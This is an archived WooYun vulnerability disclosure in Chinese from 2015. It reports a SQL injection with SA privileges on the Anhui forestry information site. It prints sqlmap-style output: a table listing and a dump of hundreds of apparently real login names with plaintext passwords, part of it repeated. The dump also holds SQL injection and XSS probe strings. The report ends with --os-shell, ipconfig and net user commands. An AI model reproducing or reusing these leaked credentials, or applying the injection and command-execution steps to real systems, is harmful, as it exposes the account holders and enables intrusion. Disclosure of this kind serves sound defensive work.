乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-11: 细节已通知厂商并且等待厂商处理中 2015-06-12: 厂商已经确认,细节仅向厂商公开 2015-06-22: 细节向核心白帽子及相关领域专家公开 2015-07-02: 细节向普通白帽子公开 2015-07-12: 细节向实习白帽子公开 2015-07-27: 细节向公众公开
此前还有文件上传漏洞,但是已经修复了。。。
安徽省林业信息网分布于安徽省各个省市,其存在严重SQL注入漏洞,并且是SA权限,可以执行系统命令。大量地市林业数据库信息可能被泄露可能。
各个地市的数据库:
当前库
Database: netweb_ahly[47 tables]+-----------------------+| D99_CMD || D99_REG || D99_Tmp || Elook_Setup || H_Dict_Data || H_Service_Function || H_Service_Info || H_Service_ItemFile || H_Service_ItemFile || H_Service_ItemType || H_Site_AccessingTotal || H_Site_AccessingTotal || H_Site_Advertising || H_Site_Base || H_Site_Comment || H_Site_Down || H_Site_Function || H_Site_Info || H_Site_LinkAdd || H_Site_LinkType || H_Site_Mail || H_Site_Message || H_Site_ModelInfo || H_Site_ModelRes || H_Site_ModelType || H_Site_Research_Item || H_Site_Research_Item || H_System_Columns || H_System_GroupPurview || H_System_InfoPass || H_System_Orgn || H_System_Purview || H_System_Quanxian || H_System_Tables || H_System_UserGroup || H_System_UserGroup || H_System_WeiWen || H_service_dept || M_Site_Content || M_System_DeriveId || S3_Tmp || SB_Enterprise || SB_Item || SB_shangbao || count_value || dtproperties || t_jiaozhu |+-----------------------+
数据表信息
Database: netweb_ahlyTable: SB_Enterprise[419 entries]+--------------------------------+----------------------------------------+| loginName | password |+--------------------------------+----------------------------------------+[22:18:13] [WARNING] console output will be trimmed to last 256 rows due to large table size| yxk19591226 | yxk19591226 || jzlywh | yzf1234csx5678 || 天涯海角 | zhm664088 || 周德贵 | zhou7573222 || 270923932 | zhouyichao || keer_zhou8888 | zk800815 || zqf513658 | zqf147258369 || TLSTGSSLGY | zwj123123zwj || QDfEwF_username | ZxMDFw_password || mj_hailou | 000000 || 操乐明 | 000333 || 372564470 | 05585560218 || xnlyuy | 05597518303 || hqy | 100001 || 1111 | 1111 || test | 111111 || 112233 | 112233 || chushujie | 118649 || ZZQ654321 | 119119 || 冯瑞强 | 123456 || ahlygk | 123456@ || 一江小道 | 123456789 || 高明GM | 123456gm || mango | 1234asdf || zhoushihua | 13085602880 || nmssysm | 1314520 || chen1397 | 13979595621 || 石桥步生态特种养殖场 | 173528 || thzj | 19621003 || lgp1972 | 19721017 || gaoshanyangzhi | 19830311 || 13856688439 | 19840705 || 946081787 | 19861210aa || ldyq1314 | 19920223jsawyk || liuchenhui | 199209 || -999' OR Asc(1)=-1 OR '1'='2 | 2024-12-20 || hz8749007 | 25188 || czslyj | 2812528 || czslyj | 3057987 || bengbu | 3115969 || 水东林业站 | 3260119 || 天上星星 | 328328 || ganzhiquan | 342523 || chly | 369369 || anipyh | 3841347g || 414603191 | 414603191 || fxl.5532308 | 523878 || nyh999 | 551268 || 安徽省雪灵仙药业有限公司 | 5520685 || 746212246 | 5567766300 || jhy580515 | 580501 || tljqlyj733 | 5822733 || wuhu | 5851822 || 我爱家乡 | 585855 || lalyzl | 591015 || xujipu | 6080257 || dfdxah | 641020 || czstcl | 664496 || 2012XQ | 666666 || hnslyj | 6678346 || nishangxiaoyu | 670523 || fnly | 6767300 || XUXUSHENG | 691229 || stevenlun | 7026971 || kuaile | 716894 || yeying | 717825 || xiong68731 | 733733 || wangzicheng | 7696577 || 谢名曙 | 771123 || ZXB66003773 | 777507 || 840805531 | 789246 || HFGD | 795057026 || Cassandra | 7WEe9W6B || ahsbbwdyy | 8021111 || 管店林业总场 | 8041004|| linder | 82881225 || huqibo | 8315183 || bmstangyilin | 8461407 || tangjun | 8755192 || oxoxoxoxoxoxox.com | 88888 || 后悔 | 891104 || masys | 9115522wan || liusong | 950404 || tongjun | 961211961211 || bizhiguo | 9701014 || xqmcdsjx | acUn3t1x || admin'='admin'-- - | admin || admin | admin') or 'a'='a'-- || Samir | aeVeINPx || 绿城园林 | aj0540 || gbrkvl | amx21phW || atestu_username | atestu_password || atestu_username' or 'a'='b'-- | atestu_password' or 'a'='b'-- || atestu_username" or "a"="b"-- | atestu_password" or "a"="b"-- || Billybob | b6y8IuX1 || bbszlk | bb1234 || yyu115 | bsf2911253 || gjnunartu | bx0Zge4z || bzlyys | bz342126 || cbh1207 | cbh147258369 || ceshi | ceshi || 525166 | chen || loxqkc | cjf845xk || crystal100 | crystal100 || huadong1977 | czh19771003 || GTYled_username | EdSTzs_password || Latricia | EKFvcFUH || afan | fdxzhj || wndqikw1z | g00dPa$$w0rD || 1 | g00dPassw0rD1 || Welcome | hFBRuOAQ || GqJhKY_username" or "a"="b"-- | hxTsHc_password" or "a"="b"-- || oykthpglucd | IN7Rt5DS || Jalia | iOPfY6gK || Nash | JV8ZXp6E || Dhadhanqirawandt | jVJTvv8x || kjq088 | kjq12310329 || flyoawloykj | L3UAB7Ml || huyaqin19811025 | lgn661208 || liuzhen01215 | LIUzhen01215 || liwei407687678 | liwei7481214 || 李磊 | ll25656022565419ll || rundong | lwd906 || suzhou | lyjcyz || Qzqoch_username | nBLaqV_password || cadmaria | nhfd24155832 || Suzyn | NsKEy1Ax || rvjuKM_username' or 'a'='b'-- | obkPAa_password' or 'a'='b'-- || YvqEPF_username' or 'a'='b'-- | OoewFQ_password' or 'a'='b'-- || pinggu2013 | pinggu2013 || Simone | POTOWOmP || vnRtaT_username | pZCJef_password || xNAKSj_username" or "a"="b"-- | qCKdUD_password" or "a"="b"-- || qinerdong | qinqiong2hannuo || Sxkseq_username" or "a"="b"-- | QsBELf_password" or "a"="b"-- || Avari | qvfP0agu || ahaqzx | qwerty || 153577222162 | r1c551 || BdOguH_username" or "a"="b"-- | RjMSar_password" or "a"="b"-- || gRdtQG_username | ROiWTC_password || root | root || 835839452 | s123456 || Ice | SPDpk0Zn || kwechtomfkv | Ss8gOZrw || hOAUPT_username | tDwxcl_password || test | test || Christiana | TO6ckuh0 || tux | tux || gyxsof_username' or 'a'='b'-- | TZLPUJ_password' or 'a'='b'-- || gZbYio_username" or "a"="b"-- | UHCVSQ_password" or "a"="b"-- || Carmelita | uu25B5Zg || xcgWew_username' or 'a'='b'-- | uxQygE_password' or 'a'='b'-- || Marlie | vcJCobJ7 || Abdul | WBz3BSwP || ahhbly | wfxb73 || wfz1978 | wfz610625 || <blank> | wmfkjlbf9 || gcfhbwsm | wsm003426 || wsx1234 | wsx1234 || wumt | wumt022670 || Cfldjc_username' or 'a'='b'-- | xDSUaJ_password' or 'a'='b'-- || <blank> | XSStest" onmouseover=alert(4384)// x=" || xgcaFO_username' or 'a'='b'-- | YCiIVl_password' or 'a'='b'-- || IGescB_username" or "a"="b"-- | YClHoX_password" or "a"="b"-- || Lynn | YCUuLY4n || 宁国奕盛力 | yishengli || yahbbzx | YRV0fnuz || ngyishengli | ysl4675777 || yutian1973 | yutian1973 || yxk19591226 | yxk19591226 || jzlywh | yzf1234csx5678 || 天涯海角 | zhm664088 || 周德贵 | zhou7573222 || 270923932 | zhouyichao || keer_zhou8888 | zk800815 || zqf513658 | zqf147258369 || TLSTGSSLGY | zwj123123zwj || QDfEwF_username | ZxMDFw_password || mj_hailou | 000000 || 操乐明 | 000333 || 372564470 | 05585560218 || xnlyuy | 05597518303 || hqy | 100001 || 1111 | 1111 || test | 111111 || 112233 | 112233 || chushujie | 118649 || ZZQ654321 | 119119 || 冯瑞强 | 123456 || ahlygk | 123456@ || 一江小道 | 123456789 || 高明GM | 123456gm || mango | 1234asdf || zhoushihua | 13085602880 || nmssysm | 1314520 || chen1397 | 13979595621 || 石桥步生态特种养殖场 | 173528 || thzj | 19621003 || lgp1972 | 19721017 || gaoshanyangzhi | 19830311 || 13856688439 | 19840705 || 946081787 | 19861210aa || ldyq1314 | 19920223jsawyk || liuchenhui | 199209 || -999' OR Asc(1)=-1 OR '1'='2 | 2024-12-20 || hz8749007 | 25188 || czslyj | 2812528 || czslyj | 3057987 || bengbu | 3115969 || 水东林业站 | 3260119 || 天上星星 | 328328 || ganzhiquan | 342523 || chly | 369369 || anipyh | 3841347g || 414603191 | 414603191 || fxl.5532308 | 523878 || nyh999 | 551268 || 安徽省雪灵仙药业有限公司 | 5520685 || 746212246 | 5567766300 || jhy580515 | 580501 || tljqlyj733 | 5822733 || wuhu | 5851822 || 我爱家乡 | 585855 || lalyzl | 591015 || xujipu | 6080257 || dfdxah | 641020 || czstcl | 664496 || 2012XQ | 666666 || hnslyj | 6678346 || nishangxiaoyu | 670523 || fnly | 6767300 || XUXUSHENG | 691229 || stevenlun | 7026971 || kuaile | 716894 || yeying | 717825 || xiong68731 | 733733 || wangzicheng | 7696577 || 谢名曙 | 771123 || ZXB66003773 | 777507 || 840805531 | 789246 || HFGD | 795057026 || Cassandra | 7WEe9W6B || ahsbbwdyy | 8021111 || 管店林业总场 | 8041004|| linder | 82881225 || huqibo | 8315183 || bmstangyilin | 8461407 || tangjun | 8755192 || oxoxoxoxoxoxox.com | 88888 || 后悔 | 891104 || masys | 9115522wan || liusong | 950404 || tongjun | 961211961211 || bizhiguo | 9701014 || xqmcdsjx | acUn3t1x || admin'='admin'-- - | admin |+--------------------------------+----------------------------------------+
--so-shell
ipconfig
net user
过滤参数的恶意字符;
危害等级:中
漏洞Rank:7
确认时间:2015-06-12 09:41
漏洞重复,不再重复处置
暂无